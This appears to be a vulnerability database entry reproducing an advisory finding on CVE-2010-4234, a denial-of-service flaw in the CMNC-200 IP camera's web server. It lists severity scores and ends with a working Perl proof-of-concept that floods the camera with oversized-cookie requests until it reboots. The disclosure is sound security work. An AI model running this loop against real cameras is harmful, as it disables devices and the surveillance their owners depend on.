6.6 Medium
AI Score
Confidence
Low
7.8 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:N/I:N/A:C
0.041 Low
EPSS
Percentile
92.1%
Finding 5: Camera Denial of Service
CVE: CVE-2010-4234
The CMNC-200 IP Camera has a built-in web server that
is vulnerable to denial of service attacks. Sending multiple
requests in parallel to the web server may cause the camera
to reboot.
Requests with long cookie header makes the IP camera reboot a few
seconds faster, however the same can be accomplished with requests
of any size.
The example code below is able to reboot the IP cameras in
less than a minute in a local network.
#!/usr/bin/perl
use LWP::UserAgent;
while (1 == 1){
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.6)");
$req = HTTP::Request->new(GET => 'http://192.168.10.100');
$req->header(Accept =>
"text/xml,application/xml,application/xhtml+xml,text/html
;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5");
$req->header("Keep-Alive" => 0);
$req->header(Connection => "close");
$req->header("If-Modified-Since" => "Mon, 12 Oct 2009
02:06:34 GMT");
$req->header(Cookie =>
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
my $res = $ua->request($req);
}